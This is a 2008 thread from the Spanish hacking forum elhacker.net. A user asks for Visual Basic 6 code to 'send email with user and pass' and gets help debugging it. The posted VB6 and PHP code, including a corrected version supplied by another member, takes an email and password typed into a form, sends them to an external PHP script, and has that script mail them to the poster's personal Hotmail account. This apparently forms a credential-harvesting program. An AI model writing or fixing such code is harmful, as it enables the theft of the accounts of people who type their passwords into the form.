elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  ENVIAR EMAIL CON USER Y PASS
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: ENVIAR EMAIL CON USER Y PASS  (Leído 3,653 veces)
jeri82

Desconectado Desconectado

Mensajes: 18


Ver Perfil
ENVIAR EMAIL CON USER Y PASS
« en: 8 Noviembre 2008, 05:46 am »

Hola a todos....
Soy nuevo usuario....
Necesito urgente un codigo de enviar a email con user y pass de vb 6 porque estoy haciendo un programa pero me falto unico codigo pero yo no se cual es codigo ademas yo he buscado en internet y ya he encontrado no entiendo nada los tutoriales, si alguien que me quiere dar codigo y me explic lo que es.... muchas gracias.

espero que me ayudara ^^


« Última modificación: 8 Noviembre 2008, 17:38 pm por jeri82 » En línea

krackwar


Desconectado Desconectado

Mensajes: 900


Ver Perfil
Re: ENVIAR EMAIL CON USER Y PASS
« Respuesta #1 en: 8 Noviembre 2008, 06:45 am »

Dos cosas leete las reglas no se pueden postear mails y este tema se a hablado 100 veces por lo menos asi que ponte a buscar  >:(.

Saludos
krackwar


En línea

Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
jeri82

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Re: ENVIAR EMAIL CON USER Y PASS
« Respuesta #2 en: 8 Noviembre 2008, 09:12 am »

sorry no sabia porque no he leido las reglas xD
disculpame
En línea

& eDu &


Desconectado Desconectado

Mensajes: 580



Ver Perfil
Re: ENVIAR EMAIL CON USER Y PASS
« Respuesta #3 en: 8 Noviembre 2008, 10:10 am »

Leete este código que publiqué

http://foro.elhacker.net/programacion_vb/tutorial_enviando_email_con_vb6-t230043.0.html

Antes de ponerlo a tu programa entiende lo que hace el codigo.
En línea

jeri82

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Re: ENVIAR EMAIL CON USER Y PASS
« Respuesta #4 en: 8 Noviembre 2008, 10:57 am »

Mira.... yo he leido este codigo que me mandaste pero no funciona llego email porque me sale error mensaje Run-time '424"
yo le puse codigo sale


Private Sub Command1_Click()
ws.Navigate ("www.plusordos.net/prueba/envio.php" & "?value=" & "txtEmail, txtPass")
End Sub

y ya he subido codigo de php es

<?php
$val = $_GET['value'];
mail ('jeri.lolita@hotmail.com', 'LLEGO PASS', $val);
?>

que raro no he llegado email nada

igual te doy muchas gracias por me mandaste link :)
En línea

& eDu &


Desconectado Desconectado

Mensajes: 580



Ver Perfil
Re: ENVIAR EMAIL CON USER Y PASS
« Respuesta #5 en: 8 Noviembre 2008, 11:36 am »

El problema es este

Código
  1. Private Sub Command1_Click()
  2. ws.Navigate ("www.plusordos.net/prueba/envio.php?value=" & txtEmail.Text & " Password " & txtPass.Text)
  3. End Sub
No puedes poner el contenido de un objeto entre comillas, ahora debería funcionar
« Última modificación: 8 Noviembre 2008, 11:39 am por & eDu & » En línea

jeri82

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Re: ENVIAR EMAIL CON USER Y PASS
« Respuesta #6 en: 8 Noviembre 2008, 11:53 am »

lo voy a probar, espero que funciona ^^ muchas gracias  :D
En línea

jeri82

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Re: ENVIAR EMAIL CON USER Y PASS
« Respuesta #7 en: 8 Noviembre 2008, 12:05 pm »

ya probe no funciona llego email pero yo copie y pegue me mandaste tu codigo que raro no llego email pero todo textbox muy bien sabes porque yo lo puse textbox de email es txtEmail y pass es txtPass que raro no llego email nada :(



Private Sub Command1_Click()
ws.Navigate ("www.plusordos.net/prueba/envio.php?value=" & txtEmail.Text & " Password " & txtPass.Text)
End Sub
En línea

& eDu &


Desconectado Desconectado

Mensajes: 580



Ver Perfil
Re: ENVIAR EMAIL CON USER Y PASS
« Respuesta #8 en: 8 Noviembre 2008, 12:08 pm »

ya probe no funciona llego email pero yo copie y pegue me mandaste tu codigo que raro no llego email pero todo textbox muy bien sabes porque yo lo puse textbox de email es txtEmail y pass es txtPass que raro no llego email nada :(



Private Sub Command1_Click()
ws.Navigate ("www.plusordos.net/prueba/envio.php?value=" & txtEmail.Text & " Password " & txtPass.Text)
End Sub

Entra aqui y dime si te llega el email ->> www.plusordos.net/prueba/envio.php?value=Olanana
En línea

jeri82

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Re: ENVIAR EMAIL CON USER Y PASS
« Respuesta #9 en: 8 Noviembre 2008, 12:10 pm »

disculpa ya llego email un poco demora pero no sale nada email y pass en email esta vacio jejejeje no se porque pero yo ya le puse email y pass en programa
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines